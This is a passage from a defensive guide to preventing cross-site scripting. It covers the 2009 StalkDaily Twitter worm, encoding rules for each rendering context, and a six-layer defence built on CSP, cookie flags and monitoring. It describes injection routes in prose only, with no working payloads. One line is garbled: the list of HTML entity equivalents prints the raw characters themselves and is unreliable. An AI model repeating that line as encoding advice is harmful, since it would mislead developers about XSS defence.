The Twitter StalkDaily worm in 2009 spread through a DOM-based XSS vulnerability in the Twitter web client. Affected users who visited a malicious profile page would have their own Twitter accounts configured to automatically tweet messages promoting the StalkDaily website, causing the payload to propagate to each of their followers. The worm went viral across Twitter’s user base within hours.
These incidents share a common thread: all of them exploited code running in a trusted context — a social network, an airline booking page, an e-commerce site — to take actions or extract data that users would never have consciously authorized. The attacker’s code ran with the full privileges of the legitimate application because the browser cannot distinguish between author-supplied scripts and injected ones once they are both present in the same page. This is the fundamental reason why preventing script injection at the source is so important, and why no combination of runtime monitoring or incident response can fully substitute for code-level XSS prevention.
Output Encoding by Context: A Comprehensive Reference
One of the most frequently misunderstood aspects of XSS prevention is that different rendering contexts require different encoding strategies. Applying the wrong encoding for a context can either fail to prevent XSS or break the functionality of the feature being built. Understanding each context and its corresponding encoding requirement is essential for building XSS-free applications.
HTML body context is the most common context. When a variable is placed between HTML tags — inside a <div>, <p>, <span>, or similar — HTML entity encoding is the correct defense. The characters &, <, >, ", and ' must be converted to their entity equivalents (&, <, >, ", and ' respectively). With entity encoding applied, any injected HTML tags appear as visible text rather than parsed markup.
HTML attribute context occurs when a variable is placed as the value of an HTML attribute. The same HTML entity encoding applies, but quoting is critically important. An attribute value that is fully enclosed in double or single quotes prevents an attacker from closing the attribute and injecting event handlers or new attributes. An unquoted attribute value is exploitable with just a space followed by an event handler name, regardless of encoding. Always quote attribute values and encode entity-significant characters within them.
JavaScript context — where a variable is embedded inside a <script> block — is significantly more complex. HTML entity encoding does not disarm JavaScript; an HTML entity inside a script block will be decoded by the HTML parser before the JavaScript parser processes it. JavaScript encoding using Unicode escapes (\uXXXX) is required for characters that could break out of the JavaScript string literal. The safest approach is to avoid embedding untrusted data directly in JavaScript, and instead pass it through a JSON API call or a data attribute that the JavaScript reads at runtime.
URL context arises when a variable is placed inside a URL — in an href, src, action, or formaction attribute, or when constructing a URL for use in JavaScript. Percent encoding (using encodeURIComponent in JavaScript or urlencode in PHP and Python) is the appropriate mechanism for URL query string values. It is critical to encode only the parameter value, not the entire URL, and to validate that the protocol of the complete URL is http: or https: before use, since javascript: and data: URLs can lead to script execution.
CSS context arises when user-controlled values are placed inside CSS style sheets or inline style attributes. This context is easily overlooked but genuinely dangerous: historically, Internet Explorer’s proprietary expression() syntax allowed JavaScript execution from CSS, and there are consistent cross-browser ways to abuse CSS injection for UI redressing and data exfiltration attacks. CSS values should only be placed in property value positions (not selectors or property names), and only after CSS hex encoding of all non-alphanumeric characters.
Whenever possible, avoid placing untrusted data in CSS, JavaScript, and URL contexts entirely, and restrict it to HTML body and HTML attribute contexts where well-established encoding libraries can handle it predictably. Modern frontend frameworks largely eliminate the risk in HTML body and attribute contexts through automatic escaping, but developers still need to reason carefully about the remaining contexts.
Building a Layered XSS Defense Strategy
Preventing XSS in production systems is not a single control or a checklist item — it is a defense posture that operates at multiple levels simultaneously. Understanding how these layers reinforce each other helps teams allocate effort sensibly and avoid the false confidence that comes from implementing one control while leaving others unaddressed.
The first and most important layer is output encoding and HTML sanitization at the point of rendering. Every variable rendered in a browser context must pass through the appropriate encoding function for its rendering context. Framework auto-escaping handles this automatically for the normal case; developer discipline covers the edge cases where escaping is bypassed or a raw output function is used. This layer prevents the vast majority of XSS vulnerabilities entirely — an attacker cannot inject executable code if every value they control is treated as inert text.
The second layer is input validation at the point of entry. Allowlist validation (defining what is acceptable, rather than what is blocked) reduces the attack surface by rejecting payloads before they reach the application’s data store. This is especially important for structured data: a phone number field should accept only digits and a few punctuation characters; a username should accept only alphanumeric characters and underscores. Rejecting malformed input early reduces the probability that a bypass technique will succeed against the output encoding layer.
The third layer is Content Security Policy. A well-configured CSP limits the damage if both previous layers fail or if an XSS vulnerability exists that has not yet been discovered. By restricting which scripts can execute and to which origins data can be sent, CSP can prevent credential theft and data exfiltration even in the presence of an active XSS payload. CSP does not eliminate the XSS vulnerability, but it can reduce a critical, exploitable flaw to a medium-severity nuisance.
The fourth layer is cookie security attributes. Setting HttpOnly, Secure, and SameSite=Strict on session cookies means that even a successfully executing XSS payload cannot steal tokens or perform silent cross-site requests with the victim’s full session privileges. This layer narrows the realistic impact of any XSS that does get through.
The fifth layer is developer education and secure code review. Security controls that developers do not understand get turned off, bypassed, or accidentally omitted. Regular security training, automated SAST scanning in the IDE (ESLint plugins like eslint-plugin-no-unsanitized, Semgrep rules), and security-aware code review checklists keep XSS awareness embedded in the daily development workflow rather than relegated to an annual assessment.
The sixth and final layer is runtime detection and incident response. Server-side logging of CSP violation reports, anomalous outbound requests from the browser, and unusual API call patterns can detect an XSS attack in progress and trigger containment steps — revoking sessions, alerting security teams, and temporarily tightening the CSP policy — before the blast radius grows. No defensive posture is complete without a monitoring and response capability.
Teams that implement all six layers build applications that are not only harder to exploit but also faster to recover from the rare case where an attacker does find a way through. The goal is not perfection — XSS vulnerabilities will occasionally reach production despite best efforts — but resilience: ensuring that when one control fails, the others limit the impact to something manageable rather than catastrophic.
Conclusion
Cross-Site Scripting is a significant threat to web application security, but it is entirely preventable with the right practices. By validating input, encoding output, and leveraging tools like CSP and sanitization libraries, developers can eliminate XSS vulnerabilities and protect their users.
Proactively testing for XSS during development and deployment ensures your applications remain secure against evolving threats. Secure your applications today and build trust with users by prioritizing robust security practices.